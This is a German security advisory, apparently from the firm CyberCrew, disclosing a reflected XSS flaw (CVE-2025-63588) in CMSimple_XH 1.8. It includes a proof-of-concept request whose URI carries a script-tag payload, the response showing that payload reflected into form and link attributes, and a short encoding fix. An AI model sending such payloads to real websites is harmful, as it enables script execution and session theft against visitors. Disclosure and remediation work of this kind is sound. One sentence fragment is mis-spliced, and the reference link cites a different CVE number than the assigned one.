
Geschätzter CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Mittel)
Zugewiesene CVE: CVE-2025-63588
Produkte: CMSimple_XH - 1.8
Hersteller: CMSimple_XH - https://www.cmsimple-xh.org/
Eine reflektierte Cross-Site-Scripting-Schwachstelle (XSS) besteht im Parsing-Code des Front-Routers von CMSimple_XH, der dynamische, mit dem Login zusammenhängende Eingaben verarbeitet. Die Anwendung spiegelt vom Angreifer kontrollierte Daten aus der Anfrage-URI direkt in das erzeugte HTML (beispielsweise in action-Attribute von Formularen und hrefs von Ankern), ohne ordnungsgemäße Ausgabekodierung. Ein Angreifer kann eine URL erstellen, die – wenn ein Opfer sie besucht – die Ausführung beliebigen JavaScripts im Browser des Opfers im Kontext der betroffenen Website bewirkt.
Hierbei handelt es sich um eine reflektierte XSS-Schwachstelle (nicht persistent); für die Ausnutzung muss ein Opfer einem manipulierten Link folgen. Der Hersteller wurde informiert; das Problem wurde dokumentiert und die oben genannte CVE zugewiesen.
HttpOnly gesetzt sind, können Sitzungstoken gestohlen werden.Die Schwachstelle stammt aus dem Code des Front-Routers / der index.php (bzw. des entsprechenden Front-Controllers), der dynamische Pfadsegmente parst und in Seiten- bzw. Vorlagenvariablen überführt. Rohe Pfadfragmente (das ?Templates...-Fragment, das vom Router von CMSimple_XH verwendet wird) werden an Seitenvorlagen übergeben und ohne ordnungsgemäße HTML-Attributkodierung oder -bereinigung in HTML-Attribute eingefügt. Dadurch können injizierte <script>-Tags oder andere Payloads unverändert gerendert werden. Ähnliche reflektierte XSS-Probleme wurden bereits für andere Webkomponenten veröffentlicht und werden häufig durch unzureichende Ausgabekodierung nicht vertrauenswürdiger Eingaben verursacht.
Dieser PoC demonstriert die Spiegelung von Angreifer-Eingaben in das zurückgegebene HTML, das im Browser eines Opfers ausgeführt wird.
Anfrage:
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45
login=true&keycut=z9U%21q2k%21F0&submit=Login
Antwort:
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
Wenn der Browser eines Opfers diese Seite rendert, wird das injizierte <script>alert(1)</script> ausgeführt.

$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';
https://github.com/cmsimple-xh/cmsimple-xh/releases https://nvd.nist.gov/vuln/detail/CVE-2025-24576
Wenn Sie Fragen oder Anliegen haben, zögern Sie bitte nicht, uns zu kontaktieren.
📞 Tel: 03-6853-5823
📧 Mail:[email protected]
| Feld | Inhalt |
|---|---|
| Firmenname | 株式会社CyberCrew |
| Standort | Akihabara-Dai-Gebäude 6. Etage, 1-18-13 Sotokanda, Chiyoda-ku, Tokio |
Wir analysieren die Schwachstellen Ihrer Organisation aus mehreren Blickwinkeln und schlagen optimale Verbesserungsmaßnahmen vor.
Wir decken zielgerichtete, szenariobasierte und LLM-Pentests ab.
Wir erkennen Lecks vertraulicher Informationen frühzeitig und reagieren schnell.
Wir führen Bewertungen der Verteidigungsfähigkeit auf Basis praktischer Angriffsszenarien durch.
Wir unterstützen ein Design, das Sicherheit bereits in den frühen Entwicklungsphasen berücksichtigt.
🌐 Offizielle Website:https://www.cybercrew.co.jp
🕒 CyberCrew — Ihr vertrauenswürdiger Sicherheitspartner.